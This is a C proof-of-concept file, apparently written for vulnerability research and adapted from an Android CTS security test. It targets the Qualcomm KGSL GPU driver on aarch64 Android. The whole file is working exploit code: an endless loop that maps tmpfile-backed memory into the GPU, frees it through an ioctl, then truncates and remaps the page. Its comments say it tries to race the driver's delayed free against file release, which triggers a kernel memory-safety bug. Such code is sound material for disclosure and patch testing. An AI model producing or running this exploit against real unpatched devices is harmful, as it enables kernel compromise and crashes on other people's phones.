/**
* Copyright (C) 2018 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
*      http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*
* ^ That header is from
* <https://android.googlesource.com/platform/cts/+/f77245e5775bcbbba413ffab4994d7b8a9a42fb0/hostsidetests/securitybulletin/securityPatch/CVE-2016-2504/poc.c>,
* which I used as basis for this.
*
* Compile with `aarch64-linux-gnu-gcc -static -o poc poc.c -Wall`.
*/

#define _GNU_SOURCE
#include <err.h>
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* ioctls */
#define KGSL_IOC_TYPE 0x09
enum kgsl_user_mem_type {
  KGSL_USER_MEM_TYPE_PMEM = 0x00000000,
  KGSL_USER_MEM_TYPE_ASHMEM = 0x00000001,
  KGSL_USER_MEM_TYPE_ADDR = 0x00000002,
  KGSL_USER_MEM_TYPE_ION = 0x00000003,
  KGSL_USER_MEM_TYPE_MAX = 0x00000007,
};
#define KGSL_USERMEM_FLAG(x) (((x) + 1) << KGSL_MEMFLAGS_USERMEM_SHIFT)
#define KGSL_MEMFLAGS_USERMEM_ADDR KGSL_USERMEM_FLAG(KGSL_USER_MEM_TYPE_ADDR)

/* add a block of pmem, fb, ashmem or user allocated address
 * into the GPU address space */
struct kgsl_map_user_mem {
  int fd;
  unsigned long gpuaddr; /*output param */
  size_t len;
  size_t offset;
  unsigned long hostptr; /*input param */
  enum kgsl_user_mem_type memtype;
  unsigned int flags;
};
#define IOCTL_KGSL_MAP_USER_MEM _IOWR(KGSL_IOC_TYPE, 0x15, struct kgsl_map_user_mem)

/* remove memory from the GPU's address space */
struct kgsl_sharedmem_free {
  unsigned long gpuaddr;
};
#define IOCTL_KGSL_SHAREDMEM_FREE _IOW(KGSL_IOC_TYPE, 0x21, struct kgsl_sharedmem_free)

#define KGSL_MEMFLAGS_USERMEM_MASK 0x000000e0
#define KGSL_MEMFLAGS_USERMEM_SHIFT 5

int main() {
  setbuf(stdout, NULL);
  setbuf(stderr, NULL);

  int kgsl_fd = open("/dev/kgsl-3d0", 0);
  if (kgsl_fd == -1)
    err(1, "unable to open /dev/kgsl-3d0");

  /* two pages, first one anon, to bypass the hacky fd lookup code */
  void *hostptr = mmap(NULL, 0x2000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
  if (hostptr == MAP_FAILED) err(1, "mmap");

  while (1) {
    int map_fd = open("/data/local/tmp/", O_TMPFILE | O_RDWR, 0600);
    if (map_fd == -1) err(1, "open tmpfile");
    if (ftruncate(map_fd, 0x1000)) err(1, "ftruncate");
    if (mmap(hostptr+0x1000, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_FIXED, map_fd, 0) == MAP_FAILED) err(1, "mmap2");

    struct kgsl_map_user_mem allocArg = {
      .fd = -1,
      .len = 0x2000,
      .hostptr = (unsigned long)hostptr,
      .memtype = KGSL_USER_MEM_TYPE_ADDR,
      .flags = KGSL_MEMFLAGS_USERMEM_ADDR
    };

    if (ioctl(kgsl_fd, IOCTL_KGSL_MAP_USER_MEM, &allocArg) < 0) {
      err(1, "IOCTL_KGSL_MAP_USER_MEM");
    } else if (!allocArg.gpuaddr) {
      errx(1, "allocated gpuaddr 0");
    }

    /* free via workqueue, we hope it'll be delayed until we reach the fput task work */
    struct kgsl_sharedmem_free freeArg = { .gpuaddr = allocArg.gpuaddr };
    if (ioctl(kgsl_fd, IOCTL_KGSL_SHAREDMEM_FREE, &freeArg)) err(1, "free");

    if (ftruncate(map_fd, 0)) err(1, "ftruncate");
    close(map_fd);

    /* fput task work via remove_vma() */
    if (mmap(hostptr+0x1000, 0x1000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0) == MAP_FAILED) err(1, "mmap3");
  }

  return 0;
}
